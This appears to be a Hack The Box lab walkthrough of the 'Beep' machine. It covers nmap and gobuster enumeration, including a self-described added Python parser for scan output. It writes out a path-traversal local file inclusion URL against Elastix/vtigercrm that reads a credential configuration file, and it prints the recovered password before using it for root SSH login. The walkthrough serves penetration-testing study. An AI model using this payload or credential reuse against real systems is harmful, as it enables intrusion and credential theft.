HacktheBox - Beep Writeup

02/11/2019

Zero to OSCP Hero Writeup #11 - Beep

Reconnaissance

1. Nmap Scan - TCP Scan

Let's start with a TCP scan of the target ip address to determine which ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.7

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

Okay, so there are a few ports open! There are the standard ports that are common on these boxes, SSH on port 22 and HTTP on port 80, but it also seems that a mail server is present on this machine, with the common mail ports and protocols in use (SMTP, POP3, IMAP etc.). There is also what looks like a Webmin admin login portal on port 10000 and, last but not least, MySQL is running on the machine as well.

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.7

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.7

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.udp

The full UDP scan shows several ports open, including TFTP, which is reported in an open|filtered state (nmap received no response, so it cannot tell an open port from a filtered one).
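All three scans above write grepable output (the .gnmap file produced by -oA) alongside the normal and XML formats. The following added example, which is not part of the original writeup, parses that format to summarise what was found, keeping confirmed open ports apart from the open|filtered UDP ports that still need a second look. The sample lines are constructed to show the format; they are not the real scan output of the box, and the service banners are placeholders.

```python
"""Summarise open ports from nmap grepable (.gnmap) output.

Added example, not from the original writeup. The sample lines below are
constructed to illustrate the .gnmap layout; they are not real scan results.
"""
import re

# Constructed sample .gnmap content (tabs separate the fields on a Host line).
SAMPLE_GNMAP = """\
Host: 10.10.10.7 ()\tStatus: Up
Host: 10.10.10.7 ()\tPorts: 22/open/tcp//ssh//OpenSSH (sample)/, 80/open/tcp//http//Apache httpd (sample)/, 443/open/tcp//ssl|http//Apache httpd (sample)/, 10000/open/tcp//http//MiniServ (sample)/\tIgnored State: closed (65531)
Host: 10.10.10.7 ()\tPorts: 69/open|filtered/udp//tftp///, 5060/open/udp//sip///
"""

# The "Ports:" field runs until the next tab (or end of line).
PORTS_RE = re.compile(r"Ports: (.*?)(?:\t|$)")


def parse_gnmap(text):
    """Return {(port, proto): {state, service, version}} for every port entry.

    Each entry in the Ports field has the layout
    port/state/proto/owner/service/rpcinfo/version/ (fields separated by '/').
    """
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        match = PORTS_RE.search(line)
        if not match:
            continue  # e.g. the "Status: Up" line carries no port data
        for entry in match.group(1).split(", "):
            fields = entry.split("/")
            if len(fields) < 7:
                continue  # malformed entry; skip rather than guess
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            results[(int(port), proto)] = {
                "state": state,
                "service": service,
                "version": version,
            }
    return results


def summarise(results):
    """Split parsed ports into confirmed open and open|filtered (unconfirmed)."""
    confirmed = sorted(k for k, v in results.items() if v["state"] == "open")
    unconfirmed = sorted(k for k, v in results.items() if v["state"] == "open|filtered")
    return confirmed, unconfirmed


if __name__ == "__main__":
    ports = parse_gnmap(SAMPLE_GNMAP)
    confirmed, unconfirmed = summarise(ports)
    print("confirmed open:")
    for port, proto in confirmed:
        info = ports[(port, proto)]
        print(f"  {port}/{proto} {info['service']} {info['version']}")
    print("open|filtered (verify by hand):")
    for port, proto in unconfirmed:
        print(f"  {port}/{proto} {ports[(port, proto)]['service']}")
```

Running it on your own nmap/initial.tcp.gnmap and nmap/full.udp.gnmap files (read the file contents and pass them to parse_gnmap) gives a single list to work from, with the open|filtered UDP ports called out separately because nmap could not confirm them.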

Enumeration - Port 80

1. Browse to 10.10.10.7

When we browse to 10.10.10.7 via HTTP, it redirects us to an HTTPS page on port 443 that shows a login portal for Elastix.

2. Gobuster

As default credentials don't seem to work on the login panel and there is nothing of note in the page source, let's run gobuster against the web server (the HTTP port redirects to HTTPS, so the URL uses https):

gobuster dir -k -u https://10.10.10.7/  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

  • dir: Indicate that we want to scan for directories 
  • -k: Skip SSL certificate verification
  • -u: URL to scan
  • -w: Wordlist to use for the directory search 

After looking through some of the more interesting directories like /config, the directory /vtigercrm catches my eye as it is another login panel.

3. Searchsploit 

Again, as default credentials don't work for the /vtigercrm login panel, let's see if searchsploit can help us forward:

searchsploit elastix

After looking at several of these exploits, the 'graph.php' LFI exploit is the one I want to look into further.

searchsploit -m exploits/php/webapps/37637.pl 

So this LFI exploits the directory /vtigercrm! 

Let's copy the LFI exploit link and see what it provides:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Okay, so this looks a little messy; let's view the page source to make it easier to read!

Bingo! So this page lists the default FreePBX database configuration, along with usernames and passwords!

As we can see, the default passwords have been changed to: jEhdIekWmdjE

Foothold - Root via LFI

After logging into FreePBX with the changed password, there was no luck gaining a foothold via the portal.

1. Logging into Beep via SSH

As SSH was running on the machine, I thought I'd try the password found in the config file to log in via SSH... and it worked!

ssh root@10.10.10.7

 jEhdIekWmdjE 

We are root! 

whoami&&id&&hostname

cat root.txt 

And through the user fanis, we were able to grab user.txt as well!

cat user.txt 

What did I learn from Beep?

I enjoyed this box as it had multiple avenues for exploitation: via the LFI, which I used, or via port 10000 by utilising a blind payload in the User-Agent field.

I think that this box is quite realistic, as I'm sure the same password is used for multiple accounts of varying permissions, as well as out-of-date and vulnerable software being run!

Conclusion

Thanks for reading! Next up is Box #12 - Granny!